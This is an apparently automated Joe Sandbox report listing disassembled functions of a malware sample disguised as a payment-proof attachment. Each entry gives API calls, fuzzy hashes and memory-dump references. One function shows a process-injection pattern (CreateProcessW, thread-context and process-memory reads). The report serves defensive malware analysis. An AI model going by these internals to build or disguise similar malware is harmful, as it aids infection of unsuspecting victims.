Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd873a4dd979acaeed88a2b26343707192c5d21c259f28774567b2dfe167139
Instruction ID: bf6f980c509db6c2684eaedeefe9ad9a5dd55fb382990942d72e9ce9ae6429ab
Opcode Fuzzy Hash: 1fd873a4dd979acaeed88a2b26343707192c5d21c259f28774567b2dfe167139
Instruction Fuzzy Hash: CEF18A716047029FD721DF28C981B6EB7E5BF88314F14896EF9958B292DB34E905CF82

Function 00FB4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB5022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB50CB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 516d1eca353ba8cb5e57e476f3d4bdefb2d60b41b6fb5d1ed2973b512cea9f7a
Instruction ID: e7fb2af4b57581a974c7f46224bb3e84c901efb5e9fefc763cbd37c650fe563c
Opcode Fuzzy Hash: 516d1eca353ba8cb5e57e476f3d4bdefb2d60b41b6fb5d1ed2973b512cea9f7a
Instruction Fuzzy Hash: 7431ADB1A047018FC321EF65E4417DBBBE8BB48704F00092EE6DA86241E77A6544DF92

Function 00FD395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00FD3973

Part of subcall function 00FD81C2: __NMSG_WRITE.LIBCMT ref: 00FD81E9
Part of subcall function 00FD81C2: __NMSG_WRITE.LIBCMT ref: 00FD81F3

__NMSG_WRITE.LIBCMT ref: 00FD397A

Part of subcall function 00FD821F: GetModuleFileNameW.KERNEL32(00000000,01070312,00000104,00000000,00000001,00000000), ref: 00FD82B1
Part of subcall function 00FD821F: ___crtMessageBoxW.LIBCMT ref: 00FD835F

Part of subcall function 00FD1145: ___crtCorExitProcess.LIBCMT ref: 00FD114B
Part of subcall function 00FD1145: ExitProcess.KERNEL32 ref: 00FD1154

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000001,00000000,?,?,00FCF507,?,0000000E), ref: 00FD399F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 937ab1c3958f84aa13a0560e98e5508d5386007abef2e338722b8efed1605a53
Instruction ID: 44c1ec67093b3a05d19f2e7f2ae2bd0b54d60de5a6a438ab6a64be7cce6bc270
Opcode Fuzzy Hash: 937ab1c3958f84aa13a0560e98e5508d5386007abef2e338722b8efed1605a53
Instruction Fuzzy Hash: 8F019B366453116AE6213724DC6272D735B9B82760B2D012BF605DB385DBF99D007663

Function 00FFC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FFC385,?,?,?,?,?,00000004), ref: 00FFC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FFC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FFC708
CloseHandle.KERNEL32(00000000,?,00FFC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FFC70F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 1b1e70e5d414a14fbf3a9ff0e4aa0984e8fba6e93919b369692754708e07d72b
Instruction ID: d8345a2b8c131b822b089d8df6031f351628d66ce6f20bdcc06bd796ae847509
Opcode Fuzzy Hash: 1b1e70e5d414a14fbf3a9ff0e4aa0984e8fba6e93919b369692754708e07d72b
Instruction Fuzzy Hash: E0E08632180228B7D7312A94AC09FCA7B1CAB05B70F104110FB55690E097B6291197D8

Function 00FFBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FFBB72

Part of subcall function 00FD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD7A85), ref: 00FD1CB1
Part of subcall function 00FD1C9D: GetLastError.KERNEL32(00000000,?,00FD7A85), ref: 00FD1CC3

_free.LIBCMT ref: 00FFBB83
_free.LIBCMT ref: 00FFBB95

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: d649a95924a8e301d4a4d96934f210fc77663c4805341a11e86f08709632dce4
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: D1E0C2A1A0070152CA206538EE44EF333CC1F44322718080EB619E3242DF28E840A4A8

Function 00FB2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00FB22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FB24F1), ref: 00FB2303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FB25A1
CoInitialize.OLE32(00000000), ref: 00FB2618
CloseHandle.KERNEL32(00000000), ref: 0102503A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 336fdcb006c64ad5ea3f56f4cac19e1a2839099f38b995677640932e71aac050
Instruction ID: 507af53a8be23a22a0f1c97597bc2a9ec7464ff49e1af7a8b005c03a9524a173
Opcode Fuzzy Hash: 336fdcb006c64ad5ea3f56f4cac19e1a2839099f38b995677640932e71aac050
Instruction Fuzzy Hash: B771E1F4D112818FC324EF6AE591498BBA9FB58340794812ED0C9EB7D9DB3E0426DF19

Function 00FFBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00FFBC18

Strings

EA06, xrefs: 00FFBC46

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 6adf82ce8d9febee49dd66ccbb988dae417c0fb2302279c24624ccdb5fbe4ae8
Instruction ID: 617a9d6306a17a2e653841e1829d0c2c62c98a083ee6daac70f990ad5196bcbd
Opcode Fuzzy Hash: 6adf82ce8d9febee49dd66ccbb988dae417c0fb2302279c24624ccdb5fbe4ae8
Instruction Fuzzy Hash: 0201B5729042587EDB28C7A8CC56FFEBBF89F15301F04455EF692D6281E5B8A7089B60

Function 01010828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 010108FD

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

_wcscpy.LIBCMT ref: 0101098C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: cd399bf4ffaf8673ef1dd9c909367adae58d22939c1b05e84945f73aea02eed1
Instruction ID: 1ad88c2da7e7df300231da887ec9105accf3a2f7e47229b8dc35f867e2c4e026
Opcode Fuzzy Hash: cd399bf4ffaf8673ef1dd9c909367adae58d22939c1b05e84945f73aea02eed1
Instruction Fuzzy Hash: 36913B35A00505DFCB18DF18C9919ADB7E5FF49310B85819AF99A8F36ADB38E941CF80

Function 00FB3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00FB3A73

Part of subcall function 00FD1405: __lock.LIBCMT ref: 00FD140B

Part of subcall function 00FB3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FB3AF3
Part of subcall function 00FB3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB3B08

Part of subcall function 00FB3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00FB3AA3,?), ref: 00FB3D45
Part of subcall function 00FB3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00FB3AA3,?), ref: 00FB3D57
Part of subcall function 00FB3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,01071148,01071130,?,?,?,?,00FB3AA3,?), ref: 00FB3DC8
Part of subcall function 00FB3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00FB3AA3,?), ref: 00FB3E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB3AB3

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 80b61bae8073b8570546c7a9d7fdc5dd7420fd385bb5848414010bd2284fa649
Instruction ID: d747c5d610042a983b2103467316d983908dddb650871249d28e608db2615384
Opcode Fuzzy Hash: 80b61bae8073b8570546c7a9d7fdc5dd7420fd385bb5848414010bd2284fa649
Instruction Fuzzy Hash: C611CD71A083419BC321EF6AEC05A0ABBE8FB95310F00891FF4C4932A1DBB99544DFD2

Function 00FDE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00FDEA29
__close_nolock.LIBCMT ref: 00FDEA42

Part of subcall function 00FD7BDA: __getptd_noexit.LIBCMT ref: 00FD7BDA

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: dd20ca294170a7ddc9b2e2dcf4a6f5ac933975c95488db63e2acc474e2e65186
Instruction ID: e2f75384f8ed3c878a99b28512cd8edfb9ed688bbd84589685e4f6b1aa7db797
Opcode Fuzzy Hash: dd20ca294170a7ddc9b2e2dcf4a6f5ac933975c95488db63e2acc474e2e65186
Instruction Fuzzy Hash: C511A0728096119ED312BF648C413583A636F82331F2E0347E4609F3E2DBBC9C01B7A5

Function 00FCF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00FD395C: __FF_MSGBANNER.LIBCMT ref: 00FD3973
Part of subcall function 00FD395C: __NMSG_WRITE.LIBCMT ref: 00FD397A
Part of subcall function 00FD395C: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000001,00000000,?,?,00FCF507,?,0000000E), ref: 00FD399F

std::exception::exception.LIBCMT ref: 00FCF51E
__CxxThrowException@8.LIBCMT ref: 00FCF533

Part of subcall function 00FD6805: RaiseException.KERNEL32(?,?,0000000E,01066A30,?,?,?,00FCF538,0000000E,01066A30,?,00000001), ref: 00FD6856

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 5fbfd91555da72da5407dc4bce60ac5f4f15ff897f91c2859422ac2616777a07
Instruction ID: 8941a05df164b744639ef2afe781eadf6ebfaf5d841b5a9d0149268bc23db808
Opcode Fuzzy Hash: 5fbfd91555da72da5407dc4bce60ac5f4f15ff897f91c2859422ac2616777a07
Instruction Fuzzy Hash: DDF0F43150420E67C708FF98DE02EDEB7AEAF00324F68442AFA04D2281CB70D645B7A5

Function 00FD3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD3868
__lock_file.LIBCMT ref: 00FD3889

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 211be2aafffb523d35174a6eb77f281ceb7e3f51c9203164ca4ce3038a6de8c1
Instruction ID: 3e7a13ce991fe11da68f86784d5c07a15819daac65643b5f200caf1039f6de78
Opcode Fuzzy Hash: 211be2aafffb523d35174a6eb77f281ceb7e3f51c9203164ca4ce3038a6de8c1
Instruction Fuzzy Hash: 74012172C00209ABCF22AFA59C0599E7B63AF80360F1D411BF92456361D7798B61FB92

Function 00FD35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

__lock_file.LIBCMT ref: 00FD3629

Part of subcall function 00FD4E1C: __lock.LIBCMT ref: 00FD4E3F

__fclose_nolock.LIBCMT ref: 00FD3634

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f45f5009880d15ae2d8d5f311eb418732c7ac2107bbafde0ea510866995bf0e9
Instruction ID: 51170eb50fcf32375255b467e2bfee54162b5843319c3e73bbef0b524b74378a
Opcode Fuzzy Hash: f45f5009880d15ae2d8d5f311eb418732c7ac2107bbafde0ea510866995bf0e9
Instruction Fuzzy Hash: 8DF09073801204AAD7117B658C02B6E7AA26F41730F2D811BE560EB3C1CB7CDA01BE96

Function 00A1AB95 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A1B3C5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A1B3E9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A1B40B

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: 4a25152d2b1e6f78fb3d4e0110f9e1187022a84e673d1df41e29f9ff84d7eba6
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: 4312CE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4F85CB5A

Function 00FD2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00FD2A0B

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: c9e86da2cda3dd8e4e40b816461ec4cff5fb3d806595ab710ea240b5600bbb66
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 6641A331A007069FDB688FA9C89156EB7A7EF64360B2C852FE845C7340E778DD41BAD0

Function 00FCED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FCEDC7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c73745dd9f09acca959532b82d7c0addcad0d940296732ef00fdc7c891b9badc
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7631E971A00106DBC718DF18C682B69FBB6FF49350B6486A9E40ACB255DB31EDC1EB90

Function 01029A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 01029A80

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e67696a31458a76b95db49ae9842653dcb36b6f991890ded961a6d02ce44ba3f
Instruction ID: 299b5b91c8e6f317d5f468aa293a3b95bbec294c6fb1d4288e2e2e413531bca2
Opcode Fuzzy Hash: e67696a31458a76b95db49ae9842653dcb36b6f991890ded961a6d02ce44ba3f
Instruction Fuzzy Hash: 4A415B74904612CFDB24CF18C585F1ABBE0BF45318F1989ACE99A4B362C776E846DF42

Function 00FDED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 7f6763cd3d7bc35bf1af1c2be17686f6196b9f544d1d70733f9477b1f4b3b99e
Instruction ID: 240cdd4b0e317a1332a88e52bb412431b662916af285ce42e925928bcd6a257d
Opcode Fuzzy Hash: 7f6763cd3d7bc35bf1af1c2be17686f6196b9f544d1d70733f9477b1f4b3b99e
Instruction Fuzzy Hash: 3F218E728086408FD7227F648C4135836635F82331F2E0643F4A15F3E6EB7D9800BBA1

Function 00FB41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB4214: FreeLibrary.KERNEL32(00000000,?), ref: 00FB4247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00FB39FE,?,00000001), ref: 00FB41DB

Part of subcall function 00FB4291: FreeLibrary.KERNEL32(00000000), ref: 00FB42C4

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
